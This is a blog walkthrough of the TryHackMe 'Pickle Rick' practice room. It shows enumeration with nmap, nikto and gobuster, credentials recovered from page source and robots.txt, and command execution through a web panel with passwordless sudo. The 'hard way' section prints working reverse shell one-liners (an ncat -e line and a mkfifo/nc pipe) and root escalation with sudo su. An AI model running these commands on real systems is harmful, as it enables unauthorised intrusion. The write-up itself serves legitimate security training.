Walkthroughs

Pickle Rick – A TryHackMe Writeup

by |Published

This article is a write-up of the TryHackMe Room “Pickle Rick”. I will explain my way of tackling this room and show you the solution that worked for me. No flags will be shown!

Link to the room: https://tryhackme.com/room/picklerick

Difficulty: Easy
Time: 15-30 minutes, depending on your knowledge

Prerequisites

  • Connect to the TryHackMe VPN and find your IP address
  • Start the room and note the IP address of your server

I suggest you create a variable of the IP address in your terminal instance – This makes it easier to follow my guide.

IP=SERVER_IP

All commands are tested on a „fresh“ Kali Linux installation. If you are using a different OS, you might need to change parts of these commands.

Task 1: What is the first ingredient Rick needs?

As always we want to start with enumerating the target. We will start with nmap to see the possible attack vectors.

> nmap -sC -sV $IP

┌──(diddy㉿kali)
└─$ nmap -sC -sV $IP  
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-07 21:46 CET
Nmap scan report for 10.10.242.71
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 77b416abb7da3568c0418343b10f3b37 (RSA)
|   256 300d26e4d9488c850140ccc3fe0af8ca (ECDSA)
|_  256 a666cb029cf4e6265829454c8f97bc2d (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.01 seconds

As we can see the server has port 22 & 80 open. Let’s get gobuster and nikto up to check for interesting directories and other useful information. While these tools are running we can check out the website that is served on port 80.

Pickle Rick web server homepage

There is nothing interesting on first glance but if we check out the source code we can find the first hint.

  <!--

    Note to self, remember username!

    Username: *********

  -->

Nice, let’s write that down for later!

Nikto and gobuster should be done by now so let’s see what the result is:

┌──(diddy㉿kali)
└─$ nikto --url http://$IP
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.242.71
+ Target Hostname:    10.10.242.71
+ Target Port:        80
+ Start Time:         2022-11-07 21:49:39 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.

The last line from nikto looks interesting, let’s note that for later. 

┌──(diddy㉿kali)-[~]
└─$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt dir -u http://10.10.242.71
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.242.71
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/07 21:55:26 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.242.71/assets/]
Progress: 81620 / 81644 (99.97%)===============================================================
2022/11/07 22:01:42 Finished
===============================================================

Gobuster did not find anything useful. The /assets directory contains a few neat images and gifs but nothing that would help us here.

/assets directory

Let’s check out the login page.

/login.php

While we do have a username, we do not have a password. We could use brute force but there is one more place where we can check for hints. Mosts websites have a /robots.txt that tells crawlers which sites they can access and which sites they can’t. Maybe there is something useful in that file? Indeed! While we cannot be 100% sure what that is, it looks like a password.

Together with the username we found earlier we should be able to log in.

Command Panel

We are greeted with a “Command Panel”. This command panel accepts bash commands and outputs the result. Let’s try some commands.

> ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

These two files look interesting, let’s see what’s inside them.

> cat Sup3rS3cretPickl3Ingred.txt
command disabled

Okay, that did not work. Seems like cat is disabled. Let’s try something else.

> less Sup3rS3cretPickl3Ingred.txt
**. ****** ****

That works. We have our first ingredient. Now let’s see what the clue is.

> less clue.txt
Look around the file system for the other ingredient.

Alright, easy enough.

Task 2: Whats the second ingredient Rick needs?

How about we check for all users with a home directory? 

> ls /home
rick
ubuntu

> ls /home/rick
second ingredients

Looks like the second ingredient is located in the home directory of Rick. Let’s check it! Don’t forget to escape the space in “second ingredient”. 

> less /home/rick/second\ ingredient
* **** ****

Alright, so far so good.

Task 3: Whats the third ingredient Rick needs?

Now we only need to find the last ingredient. Since the final answer is usually located in the /root directory we need to escalate our privileges to the root user first, or need a way to execute commands with sudo permissions. 

Now there are two ways that I found on how to access the last ingredient. I am not sure which one the intended way is but let's start with the easy one. If you are curious you can check out the "harder" one after this.

Task 3.1 The easy way

As per tradition, the last answer is located in the /root directory. This directory can only be accessed by the root user or a user with root privileges. A simple way to can check if a user has sudo permissions is to execute a command like ls with sudo. If there is any output, the user has sudo permissions.

> sudo ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

Yup, there is the output. Seems like the user running the web server (www-data) has sudo permission WITHOUT a password. That is bad. Let’s find the final ingredient.

> sudo ls /root
3rd.txt
snap

> sudo less /root/3rd.txt
3rd ingredients: ***** *****

With this answer we have completed the room. Nice!

Task 3.2 The hard way

Since I did not think that this room would give me the last answer that easily, I started an nc reverse shell with the command panel.

On my local machine I started an nc listener with:

> nc -lnvp $PORT

In the command panel I tried to execute this command to create the shell:

> ncat -e /bin/bash $YOURIP $PORT

The first command I tried was disabled, so I used this one: CREDIT

> rm -f /tmp/b; mkfifo /tmp/b; /bin/sh -i 2>&1 0</tmp/b | nc $YOURIP $PORT 1>/tmp/b
┌──(diddy㉿kali)
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.21.146] from (UNKNOWN) [10.10.242.71] 45248
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
ip-10-10-242-71
$

Next I tried to gain access to the root user with:

> sudo su
> whoami
root

And then finally I tried finding the third ingredient in the root directory.

> ls /root
3rd.txt
snap

> less /root/3rd.txt
3rd ingredients: ***** *****

Was it overkill? Yes. Was it way more fun? Absolutely!

The End

That was the room “Pickle Rick”. I hope everything was clear. If not, please let me know. I will try to answer all questions that come up.

You may also like

Leave a comment

Your email address will not be published. Required fields are marked *

Consent Management Platform by Real Cookie Banner